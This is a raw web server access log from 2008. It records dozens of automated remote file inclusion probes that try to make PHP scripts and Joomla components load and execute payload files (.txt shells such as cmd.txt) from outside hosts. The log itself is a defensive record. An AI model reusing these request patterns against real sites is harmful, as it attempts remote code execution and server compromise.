210.245.87.117 - - [29/Jul/2008:10:03:17 -0700] "GET /errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:03:18 -0700] "GET /logs/join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:03:18 -0700] "GET /logs/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:03:21 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:03:23 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 200 18453 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:03:25 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:03:26 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:03:26 -0700] "GET /errors.php?error=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:03:27 -0700] "GET /logs/errors.php?error=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.108.67.156 - - [29/Jul/2008:10:03:29 -0700] "GET /logs/access_080218.log//errors.php?error=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.156 - - [29/Jul/2008:10:03:32 -0700] "GET //errors.php?error=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.156 - - [29/Jul/2008:10:03:34 -0700] "GET /logs//errors.php?error=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:03:37 -0700] "GET /logs/access_080225.log/index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:10:03:37 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:03:39 -0700] "GET /index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:03:40 -0700] "GET /logs/index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.176.60 - - [29/Jul/2008:10:03:48 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.fieldpaoli.com/images/id.txt? HTTP/1.1" 200 18417 "-" "libwww-perl/5.805" "www.dmulk.com"
193.207.106.54 - - [29/Jul/2008:10:03:50 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.207.106.54 - - [29/Jul/2008:10:03:50 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.207.106.54 - - [29/Jul/2008:10:03:50 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:04:04 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:04:04 -0700] "GET //common/db.php?commonpath=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:04:04 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:04:05 -0700] "GET //common/db.php?commonpath=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:04:05 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.67.156 - - [29/Jul/2008:10:04:05 -0700] "GET /logs/access.log//errors.php?error=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:04:07 -0700] "GET /logs/access.log/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:04:08 -0700] "GET /errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:04:08 -0700] "GET /logs/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:04:29 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:04:46 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:04:46 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:10:04:52 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:10:04:58 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:05:00 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:05:00 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:05:02 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:05:02 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:05:03 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:10:05:04 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:10:05:10 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:10:05:12 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:05:16 -0700] "GET /join.php?DOCUMENT_ROOT=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:05:17 -0700] "GET /logs/access_080528.log/join.php?DOCUMENT_ROOT=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:05:17 -0700] "GET /logs/join.php?DOCUMENT_ROOT=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:10:05:25 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:10:05:27 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:05:29 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:10:05:29 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:05:36 -0700] "GET /logs/access.log/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:05:36 -0700] "GET /errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:05:36 -0700] "GET /logs/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:05:55 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:05:55 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:05:56 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
91.193.130.151 - - [29/Jul/2008:10:05:58 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://grupo.e-sportv.com/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:10:06:08 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:10:06:09 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:10:06:09 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:06:12 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:06:12 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:06:13 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:06:14 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:10:06:15 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:06:39 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:10:06:54 -0700] "GET /logs/access_071226.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:10:06:55 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:10:06:56 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:10:06:56 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:10:06:57 -0700] "GET /logs/access_080313.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:07:04 -0700] "GET /logs/access.log/index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:07:12 -0700] "GET /logs/access_080528.log/join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:07:13 -0700] "GET /join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:07:13 -0700] "GET /logs/join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:07:15 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:07:16 -0700] "GET /logs/?sourcedir=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 200 58281 "-" "libwww-perl/5.811" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:10:07:17 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:10:07:29 -0700] "GET /errors.php?error=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:10:07:32 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:10:07:33 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:10:07:34 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:10:07:46 -0700] "GET /errors.php?error=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:07:47 -0700] "GET /logs/access_080330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:07:47 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:07:48 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:10:07:51 -0700] "GET //common/db.php?commonpath=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:10:07:54 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.32.28.161 - - [29/Jul/2008:10:07:57 -0700] "GET /logs/access.log//index2.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.32.28.161 - - [29/Jul/2008:10:07:57 -0700] "GET //index2.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.32.28.161 - - [29/Jul/2008:10:07:57 -0700] "GET /logs//index2.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:08:00 -0700] "GET /logs/access_080528.log/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:08:00 -0700] "GET /errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:08:01 -0700] "GET /logs/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.143.162 - - [29/Jul/2008:10:08:23 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:08:30 -0700] "GET /logs/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:08:33 -0700] "GET /?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 200 18425 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:08:49 -0700] "GET /logs/access_080315.log/index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.183.82 - - [29/Jul/2008:10:09:27 -0700] "GET /logs/access.log/index.php?x=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
193.178.228.12 - - [29/Jul/2008:10:09:29 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
193.178.228.12 - - [29/Jul/2008:10:09:29 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
74.55.183.82 - - [29/Jul/2008:10:09:29 -0700] "GET /index.php?x=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 200 18415 "-" "libwww-perl/5.813" "www.dmulk.com"
74.55.183.82 - - [29/Jul/2008:10:09:29 -0700] "GET /logs/index.php?x=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
62.169.0.50 - - [29/Jul/2008:10:09:37 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.spanishvida.com//admin/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
62.169.0.50 - - [29/Jul/2008:10:09:37 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.spanishvida.com//admin/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.22.94.70 - - [29/Jul/2008:10:09:38 -0700] "GET /logs/access_080321.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.22.94.70 - - [29/Jul/2008:10:09:38 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.22.94.70 - - [29/Jul/2008:10:09:38 -0700] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:09:40 -0700] "GET /logs/access_080528.log/join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:09:41 -0700] "GET /join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:09:41 -0700] "GET /logs/join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:09:44 -0700] "GET /logs/access_080528.log/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:09:44 -0700] "GET /errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:09:45 -0700] "GET /logs/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:10:09:53 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:10:09:54 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:10:09:56 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
